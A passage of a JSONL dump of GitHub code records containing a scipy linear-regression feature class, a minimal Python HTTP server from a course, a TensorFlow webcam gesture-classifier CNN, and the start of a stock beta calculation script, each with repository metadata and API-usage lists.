"matplotlib.pyplot.subplots", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}]}
+{"seq_id": "22730035953", "text": "\"\"\"Calculates quantity values after linearization.\n\"\"\"\nfrom dm.attrs.AbstractPrepareAttr import AbstractPrepareAttr\nfrom scipy import stats\n\n__author__ = 'Klára Nečasová'\n__email__ = 'xnecas24@stud.fit.vutbr.cz'\n\n\nclass InLinear(AbstractPrepareAttr):\n def execute(self, timestamp_before, timestamp_after, column, precision,\n start_before, end_before, start_after, end_after, prefix):\n def compute(start, end, timestamp, interval_name):\n res = self.interval_selector.interval(column, start, end)\n x = []\n y = []\n for i in range(0, len(res)):\n x.append(i + start)\n y.append(res[i])\n\n slope, intercept, _, _, _ = stats.linregress(x, y)\n res = round(intercept + slope * timestamp, precision)\n\n if interval_name == 'before':\n interval = end_before - start_before\n else:\n interval = end_after - start_after\n name = self.attr_name(column, prefix, interval_name, str(interval))\n\n return name, res\n\n before = [compute(start_before, end_before, timestamp_before, 'before')]\n after = [compute(start_after, end_after, timestamp_after, 'after')]\n\n return before, after\n", "repo_name": "Klarksonnek/DP", "sub_path": "dm/attrs/InLinear.py", "file_name": "InLinear.py", "file_ext": "py", "file_size_in_byte": 1275, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dm.attrs.AbstractPrepareAttr.AbstractPrepareAttr", "line_number": 10, "usage_type": "name"}, {"api_name": "scipy.stats.linregress", "line_number": 21, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 21, "usage_type": "name"}]}
+{"seq_id": "13422132876", "text": "#coding:utf-8\r\nimport http.server\r\nimport socketserver\r\n\r\nport = 80\r\nadress =(\"\",port)\r\nhandler= http.server.SimpleHTTPRequestHandler\r\nhttpd = socketserver.TCPServer(adress,handler)\r\nprint(f\"Le server a démarré sur le port {port}\")\r\nhttpd.serve_forever()", "repo_name": "CherifaHamroun/python-project", "sub_path": "Cours/Server TCP/ServeurHTTPetPageWeb.py", "file_name": "ServeurHTTPetPageWeb.py", "file_ext": "py", "file_size_in_byte": 256, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "http.server.server", "line_number": 7, "usage_type": "attribute"}, {"api_name": "http.server", "line_number": 7, "usage_type": "name"}, {"api_name": "socketserver.TCPServer", "line_number": 8, "usage_type": "call"}]}
+{"seq_id": "1265073349", "text": "import tensorflow as tf, numpy as np, imageio, matplotlib.pyplot as plt, cv2, traceback, os\n\n\"\"\"\nConvolutional Layer with Max Pooling and Local Response Normalization\n\"\"\"\ndef conv_layer(in_layer,out_chan,size,sigma=0.01,b=0.0,strd=[1,1,1,1],pool=True):\n in_chan = in_layer.shape.as_list()[3]\n w = tf.Variable(tf.truncated_normal([size,size,in_chan,out_chan],stddev=sigma))\n b = tf.Variable(tf.constant(b, shape=[out_chan]))\n h_ = tf.nn.conv2d(in_layer, w, strides=strd,padding='VALID')+b\n p = tf.nn.max_pool(h_,ksize = [1,4,4,1], strides = [1,2,2,1], padding='VALID')\n h = tf.nn.relu(p)\n n = tf.nn.local_response_normalization(h, depth_radius=min(4,out_chan-2))\n if pool:\n return w,b,h,n\n h = tf.nn.relu(h_)\n n1 = tf.nn.local_response_normalization(h,depth_radius=min(4,out_chan-2))\n return w,b,h,n1\n\n\n\"\"\"\nFully Connected Layer\n\"\"\"\ndef conn_layer(in_layer,out_nodes,op_layer=False,sigma=0.01,b=0.0):\n i_s = in_layer.shape.as_list()\n #print(i_s)\n in_layer2 = in_layer\n if len(i_s) > 2:\n in_layer2 = tf.reshape(in_layer,[-1,i_s[1]*i_s[2]*i_s[3]])\n w = tf.Variable(tf.truncated_normal([i_s[1]*i_s[2]*i_s[3],out_nodes],stddev=sigma))\n else:\n w = tf.Variable(tf.truncated_normal([i_s[-1],out_nodes],stddev=sigma))\n b = tf.Variable(tf.constant(b, shape=[out_nodes]))\n h = tf.matmul(in_layer2,w)+b\n if not op_layer:\n h = tf.nn.relu(h)\n r = tf.nn.l2_loss(w)\n return w,b,h,r\n\n\n\"\"\"\nThe architecture: 3 conv layers and 2 fc layers with dropout\n\"\"\"\noutput_classes = 6\nx = tf.placeholder(tf.float32, shape=[None,128*128*1])\ny = tf.placeholder(tf.float32, shape=[None,output_classes])\nlearning_rate = tf.placeholder(tf.float32)\nkeep_prob = tf.placeholder(tf.float32)\nx_img = tf.reshape(x,[-1,128,128,1])\nw1,b1,h1,n1 = conv_layer(x_img,64,16)\nw2,b2,h2,n2 = conv_layer(n1,32,8)\nw3,b3,h3,n3 = conv_layer(n2,16,16)\nw4,b4,h4,r4 = conn_layer(n3,1024)\nh4_drop = tf.nn.dropout(h4,keep_prob)\nw5,b5,h5,r5 = conn_layer(h4_drop,512)\nh5_drop = tf.nn.dropout(h5,keep_prob)\nw6,b6,y_,r6 = conn_layer(h5_drop,output_classes,op_layer=True)\n\n\n\"\"\"\nLoss function: Softmax Cross Entropy\n\"\"\"\nloss0 = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=y_))\nreg = r4+r5+r6\nloss = loss0 + 0.01*reg\n\n\"\"\"\nAdaptive moments for training\n\"\"\"\ntrain_step = tf.train.AdamOptimizer(learning_rate).minimize(loss)\n\n\n\"\"\"\nCompare predicted classes vs actual classes\n\"\"\"\ncorrect_prediction = tf.cast(tf.equal(tf.argmax(y,1),tf.argmax(y_,1)),tf.float32)\n\n\"\"\"\nSaver object to save and restore variables\n\"\"\"\nsaver = tf.train.Saver({'w1':w1,'b1':b1,'w2':w2,'b2':b2,'w3':w3,'b3':b3,'w4':w4,'b4':b4,'w5':w5,'b5':b5,'w6':w6,'b6':b6})\n\n\"\"\"\nVisualize output of a convolutional layer\n\"\"\"\ndef visualize_layer(layer,sess):\n img = cv2.imread('./New Data/Test/1/umaschd1.pgm',0)\n ch = 1\n if len(img.shape) > 2:\n ch = min(3,img.shape[2])\n img = img[:,:,:ch]\n ip = cv2.resize(img,(128,128),interpolation=cv2.INTER_AREA).reshape(128*128*ch)\n unit = sess.run(layer,feed_dict = {x:[ip]})\n## m = unit[0][0][0][0]\n## for i in range(unit.shape[0]):\n## for j in range(unit.shape[1]):\n## for k in range(unit.shape[2]):\n## for l in range(unit.shape[3]):\n## m = max(m,unit[i][j][k][l])\n## unit = unit*255/m\n cv2.imshow('frame',unit[0,:,:,:3])\n cv2.waitKey(1)\n\n\n\"\"\"\ncheck validation accuracy\n\"\"\"\ndef validate(net_loader,sess,test=False):\n acc = 0\n ls2 = 0\n acc_t = 0\n ls_t = 0\n test_data = net_loader.test_data\n step = 1\n out_str = 'validation loss:'\n if test == False:\n step = 4\n out_str = 'test loss:'\n try:\n for i in range(0,len(test_data),step):\n #print(file, lab)\n ip = net_loader.get_single_img(test_data[i][0])\n lab = test_data[i][1]\n #print('predicted: ',np.argmax(sess.run(y_,feed_dict={x:[ip],keep_prob:1.0})))\n #print('actual: ',np.argmax(lab), ' ',lab)\n acc += correct_prediction.eval(feed_dict={x:[ip],y:[lab],keep_prob:1.0})\n ls2 += loss.eval(feed_dict={x:[ip], y:[lab], keep_prob:1.0})\n acc /= len(test_data)/step\n ls2 /= len(test_data)/step\n print(out_str,ls2, '; test acc: ',acc)\n return acc,ls2\n except:\n traceback.print_exc()\n\n\"\"\" \nTrain the model. Inputs: number of epochs, learning rate, train and test data, and whether to continue training model or start afresh\n\"\"\"\ndef train(epochs,batch_sz,epsilon,net_loader,reload):\n print('epochs:',epochs,' learning rate:',epsilon,' batch size:', batch_sz,' reload:',reload)\n ls = []\n ls2 = []\n acc = []\n with tf.Session(config=tf.ConfigProto(log_device_placement=True)) as sess:\n sess.run(tf.global_variables_initializer())\n ckpt = 'model1_temp.ckpt'\n acc_file = []\n prev_acc = -1\n prev_ls = 999999999\n if reload == True:\n try:\n saver.restore(sess, net_loader.model_dir+ckpt)\n print(\"Model reloaded successfully.\")\n try:\n acc_file = open(net_loader.model_dir+'prev_acc.txt','r')\n prev_acc = np.float32(acc_file.readline().strip())\n prev_ls = np.float32(acc_file.readline().strip())\n acc_file.close()\n print('previous test loss: ',prev_ls)\n print('previous test accuracy: ',prev_acc)\n except OSError:\n pass\n except tf.errors.NotFoundError:\n print(\"Model \"+ckpt+\" not found, will create new file\")\n else:\n print(\"'Reload' set to 'False', starting afresh\")\n\n for e in range(epochs):\n print(e+1)\n l = 0\n a = 0\n for b in range(0,net_loader.train_size,batch_sz):\n ip = net_loader.get_batch_random(batch_sz)\n train_step.run(feed_dict={x:ip[0],y:ip[1],learning_rate:epsilon,keep_prob:0.5})\n l += loss.eval(feed_dict={x:ip[0],y:ip[1],keep_prob:1.0})\n a += np.mean(correct_prediction.eval(feed_dict={x:ip[0],y:ip[1],keep_prob:1.0}))\n l /= net_loader.train_size/batch_sz\n a /= net_loader.train_size/batch_sz\n print(\"Train loss: \",l)\n print(\"Train acc: \",a)\n ls.append(l)\n if ((e+1)%(epochs/10) == 0) or epochs <= 50:\n a,l = validate(net_loader,sess,True)\n if len(acc)<=1:\n if a>=prev_acc:\n save_path = saver.save(sess, net_loader.model_dir+ckpt)\n print('Model saved at ', save_path) \n elif a>=np.amax(acc) and a>=prev_acc:\n save_path = saver.save(sess, net_loader.model_dir+ckpt)\n print('Model saved at ', save_path)\n acc_file = open(net_loader.model_dir+'prev_acc.txt','w')\n acc_file.write(str(a[0])+'\\n')\n acc_file.write(str(l)+'\\n')\n acc_file.close()\n acc.append(a)\n ls2.append(l)\n a,l = validate(net_loader,sess,True)\n print(\"Final test loss:\",l,\" ; Final test accuracy:\",a)\n## save_path = saver.save(sess, net_loader.model_dir+ckpt)\n## print('Model saved at ', save_path)\n x1 = [i for i in range(len(ls))]\n x2 = [i for i in range(len(acc))]\n x3 = [i for i in range(len(ls2))]\n plt.figure('train loss')\n plt.plot(x1,ls)\n plt.figure('test acc')\n plt.plot(x2,acc)\n plt.figure('test loss')\n plt.plot(x3,ls2)\n plt.show()\n\n\"\"\"\nTest the model without training.\n\"\"\"\ndef test(net_loader):\n with tf.Session() as sess:\n ckpt = 'model6.ckpt'\n saver.restore(sess, net_loader.model_dir+ckpt)\n acc = 0\n for file, lab in net_loader.test_data:\n img = net_loader.get_single_img(file)\n #cv2.imshow('frame',sess.run(p1,feed_dict={x:[img]})[0,:,:,:3])\n #cv2.waitKey(1)\n acc += correct_prediction.eval(feed_dict={x:[img], y:[lab],keep_prob:1.0})\n acc/=net_loader.test_size\n print(acc)\n\n\"\"\"\nWith video check\n\"\"\"\ndef foo(net_loader):\n with tf.Session() as sess:\n ckpt = 'model1.ckpt'\n saver.restore(sess, net_loader.model_dir+ckpt)\n cap = cv2.VideoCapture(0)\n \n while(True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Our operations on the frame come here\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n ggray=gray\n cv2.rectangle(ggray,(0,0),(128*2,128*2),(0,255,0),3)\n # Display the resulting frame\n cv2.imshow('gray',ggray)\n cv2.waitKey(1)\n## if cv2.waitKey(1) & 0xFF == ord('q'):\n## break\n## elif cv2.waitKey(1) & 0xFF == ord(' '):\n gray=gray[0:128*2,0:128*2]\n height, width = gray.shape[:2]\n gray = cv2.resize(gray,(int(0.5*width), int(0.5*height)), interpolation = cv2.INTER_CUBIC)\n gray=np.reshape(gray,[1,128*128])\n print(net_loader.nums_class[sess.run(tf.argmax(y_,1),feed_dict={x:gray,keep_prob:1.0})[0]])\n \n # When everything done, release the capture\n cap.release()\n cv2.destroyAllWindows()\ndef foo1(net_loader):\n with tf.Session() as sess:\n ckpt = 'model1.ckpt'\n saver.restore(sess, net_loader.model_dir+ckpt)\n cap = cv2.VideoCapture(0)\n fgbg = cv2.createBackgroundSubtractorMOG2()\n while(1):\n ret, frame = cap.read()\n if ret == True:\n fgmask = fgbg.apply(frame)\n \n cv2.imshow('frame',frame[100:450,80:330,:])\n cv2.imshow('fgmask',fgmask[100:450,80:330])\n\n\n fgmask = fgmask[100:450,80:330]\n fgmask = cv2.resize(fgmask ,(128,128), interpolation = cv2.INTER_CUBIC)\n fgmask = np.reshape(fgmask , [1,128*128*1])\n print('Predicted :',net_loader.nums_class[sess.run(tf.argmax(y_,1),feed_dict={x:fgmask,keep_prob:1.0})[0]])\t\n\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n else:\n break\n cap.release()\n cv2.destroyAllWindows()\n#merging with teja\n\ndef test_wtih_cam(net_loader):\n with tf.Session() as sess:\n ckpt = 'model1_temp.ckpt'\n saver.restore(sess, net_loader.model_dir+ckpt)\n cap = cv2.VideoCapture(0)\n #---------------------------------------------------------------------------------------#\n #Capture Background\n print('Enter \\'c\\' to capture empty background')\n while True:\n ret, frame = cap.read()\n roi = frame[:256,:256,:]\n\n hsv = cv2.cvtColor(roi,cv2.COLOR_BGR2HSV)\n target = frame\n hsvt = cv2.cvtColor(target,cv2.COLOR_BGR2HSV)\n\n cv2.rectangle(frame,(0,0),(256,256),(0,255,0),3)\n cv2.imshow('frame',frame[:256,:256,:])\n\n if ret == True:\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n elif k == ord('c'):\n # calculating object histogram\n roihist = cv2.calcHist([hsv],[0, 1], None, [180, 256], [0, 180, 0, 256] )\n # normalize histogram and apply backprojection\n cv2.normalize(roihist,roihist,0,255,cv2.NORM_MINMAX)\n break\n else:\n break\n cv2.destroyAllWindows()\n #---------------------------------------------------------------------------------------#\n cv2.imshow('Actual',frame[:1,:1])\n cv2.imshow('Output',frame[:1,:1])\n cv2.moveWindow('Actual', 100,100)\n cv2.moveWindow('Output', 600,100)\n #---------------------------------------------------------------------------------------#\n #Actual capture of images\n print('Started the cam to predict')\n while True:\n ret, frame = cap.read()\n if ret == True:\n target = frame\n hsvt = cv2.cvtColor(target,cv2.COLOR_BGR2HSV)\n dst = cv2.calcBackProject([hsvt],[0,1],roihist,[0,180,0,256],1)\n\n disc = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(10,10))\n cv2.filter2D(dst,-1,disc,dst)\n\n blur = cv2.GaussianBlur(dst, (11,11), 0)\n blur = cv2.medianBlur(blur, 15)\n \n ret,thresh = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n thresh = cv2.merge((thresh,thresh,thresh))\n thresh = cv2.bitwise_not(thresh)\n op = frame[:256,:256,:]\n \n cv2.imshow('Actual',op)\n \n t_=thresh = thresh[:256,:256,:]\n thresh = cv2.resize(thresh ,(128,128), interpolation = cv2.INTER_CUBIC)\n thresh = cv2.cvtColor(thresh,cv2.COLOR_BGR2GRAY)\n thresh = np.reshape(thresh , [1,128,128, 1])\n thresh_ = np.reshape(thresh , [1,128*128*1])\n ans = net_loader.nums_class[sess.run(tf.argmax(y_,1),feed_dict={x:thresh_,keep_prob:1.0})[0]]\n\n print('Predicted :',ans) \n \n op_ = np.zeros((100,256,3))\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(op_,ans.split('/')[-1],(0,90), font, 2,(255,0,0),2,cv2.LINE_AA)\n op = np.vstack((t_,op_))\n cv2.imshow('Output', op)\n \n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n else:\n break \n\n cap.release()\n cv2.destroyAllWindows()\n", "repo_name": "satyatejachikatla/Gesture-Classifier", "sub_path": "tf imp/cnn.py", "file_name": "cnn.py", "file_ext": "py", "file_size_in_byte": 14271, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.Variable", "line_number": 8, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 8, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 9, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 9, "usage_type": "call"}, {"api_name": "tensorflow.nn.conv2d", "line_number": 10, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.max_pool", "line_number": 11, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 11, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 12, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 12, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.local_response_normalization", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.local_response_normalization", "line_number": 17, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 17, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.l2_loss", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 46, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.nn.dropout", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.dropout", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Saver", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 81, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 87, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 92, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 92, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 102, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 133, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 143, "usage_type": "call"}, {"api_name": "tensorflow.ConfigProto", "line_number": 143, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 156, "usage_type": "call"}, {"api_name": "tensorflow.errors", "line_number": 162, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 208, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 208, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "tensorflow.Session", "line_number": 215, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 231, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 234, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 241, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 241, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 243, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 245, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 246, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 252, "usage_type": "call"}, {"api_name": "cv2.INTER_CUBIC", "line_number": 252, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 253, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 254, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 258, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 260, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 263, "usage_type": "call"}, {"api_name": "cv2.createBackgroundSubtractorMOG2", "line_number": 264, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 270, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 271, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 275, "usage_type": "call"}, {"api_name": "cv2.INTER_CUBIC", "line_number": 275, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 276, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 277, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 279, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 285, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 289, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 292, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 300, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 300, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 302, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 302, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 304, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 305, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 308, "usage_type": "call"}, {"api_name": "cv2.calcHist", "line_number": 313, "usage_type": "call"}, {"api_name": "cv2.normalize", "line_number": 315, "usage_type": "call"}, {"api_name": "cv2.NORM_MINMAX", "line_number": 315, "usage_type": "attribute"}, {"api_name": "cv2.destroyAllWindows", "line_number": 319, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 321, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 322, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 323, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 324, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 332, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 332, "usage_type": "attribute"}, {"api_name": "cv2.calcBackProject", "line_number": 333, "usage_type": "call"}, {"api_name": "cv2.getStructuringElement", "line_number": 335, "usage_type": "call"}, {"api_name": "cv2.MORPH_ELLIPSE", "line_number": 335, "usage_type": "attribute"}, {"api_name": "cv2.filter2D", "line_number": 336, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 338, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 339, "usage_type": "call"}, {"api_name": "cv2.threshold", "line_number": 341, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 341, "usage_type": "attribute"}, {"api_name": "cv2.THRESH_OTSU", "line_number": 341, "usage_type": "attribute"}, {"api_name": "cv2.merge", "line_number": 342, "usage_type": "call"}, {"api_name": "cv2.bitwise_not", "line_number": 343, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 346, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 349, "usage_type": "call"}, {"api_name": "cv2.INTER_CUBIC", "line_number": 349, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 350, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 350, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 352, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 353, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 357, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 358, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 359, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 359, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 360, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 361, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 363, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 370, "usage_type": "call"}]}
+{"seq_id": "4238892563", "text": "import csv\r\nimport jalali\r\nimport datetime\r\nimport numpy as np\r\nimport pandas as pd\r\nimport dateutil.relativedelta\r\n\r\n\r\ndef calcCov(end, start, df): # Calculates covariance.\r\n df = df[(df[\"date\"] >= start) & (df[\"date\"] <= end)][[\"return\", \"return_index\"]]\r\n return np.cov(df[\"return\"], df[\"return_index\"])[0][1]\r\n\r\ndef calcBeta(end, start, df, cov): # Calculates beta.\r\n df = df[(df[\"date\"] >= start) & (df[\"date\"] <= end)][\"return_index\"]\r\n var = np.var(df)\r\n return cov / var\r\n\r\ndef calcSD(end, start, df): # Calculates standard deviation.\r\n df = df[(df[\"date\"] >= start) & (df[\"date\"] <= end)][\"return\"]\r\n return np.std(df)\r\n\r\ndef calcTotalReturn(end, start, df): # Calculates total return value.\r\n df = df[(df[\"date\"] >= start) & (df[\"date\"] <= end)][\"return\"]\r\n return np.sum(df)\r\n\r\ndef calcCV(end, start, df, sd, tr): # Calculates CV.\r\n df = df[(df[\"date\"] >= start) & (df[\"date\"] <= end)]\r\n row_count, _ = df.shape\r\n return sd / (tr / row_count)\r\n\r\ndef datetimeToString(date): # Convertes a date object to integer like datetime.date(2020, 1, 12) ---> 20200112.\r\n date = str(date)\r\n return int(date[0:4] + date[5:7] + date[8:])\r\n\r\ndef controlAll(start=None, end=None): # Runs all functions above for calculating table numbers.\r\n with open(\"Beta/inData/stocks_urls.csv\", \"r\", newline=\"\", encoding=\"utf-8\") as file:\r\n reader = csv.reader(file)\r\n\r\n # All are datetime.date() type.\r\n today = datetime.date.today()\r\n last_1_month = datetimeToString(today + dateutil.relativedelta.relativedelta(months=-1))\r\n last_3_month = datetimeToString(today + dateutil.relativedelta.relativedelta(months=-3))\r\n last_6_month = datetimeToString(today + dateutil.relativedelta.relativedelta(months=-6))\r\n last_9_month = datetimeToString(today + dateutil.relativedelta.relativedelta(months=-9))\r\n last_1_year = datetimeToString(today + dateutil.relativedelta.relativedelta(years=-1))\r\n last_2_year = datetimeToString(today + dateutil.relativedelta.relativedelta(years=-2))\r\n last_3_year = datetimeToString(today + dateutil.relativedelta.relativedelta(years=-3))\r\n today = datetimeToString(today)\r\n\r\n df_out_m1 = pd.DataFrame(columns=['ticker', 'cov', 'beta', 'sd', 'tr', 'cv'])\r\n df_out_m3 = pd.DataFrame(columns=['ticker', 'cov', 'beta', 'sd', 'tr', 'cv'])\r\n df_out_m6 = pd.DataFrame(columns=['ticker', 'cov', 'beta', 'sd', 'tr', 'cv'])\r\n df_out_m9 = pd.DataFrame(columns=['ticker', 'cov', 'beta', 'sd', 'tr', 'cv'])\r\n df_out_y1 = pd.DataFrame(columns=['ticker', 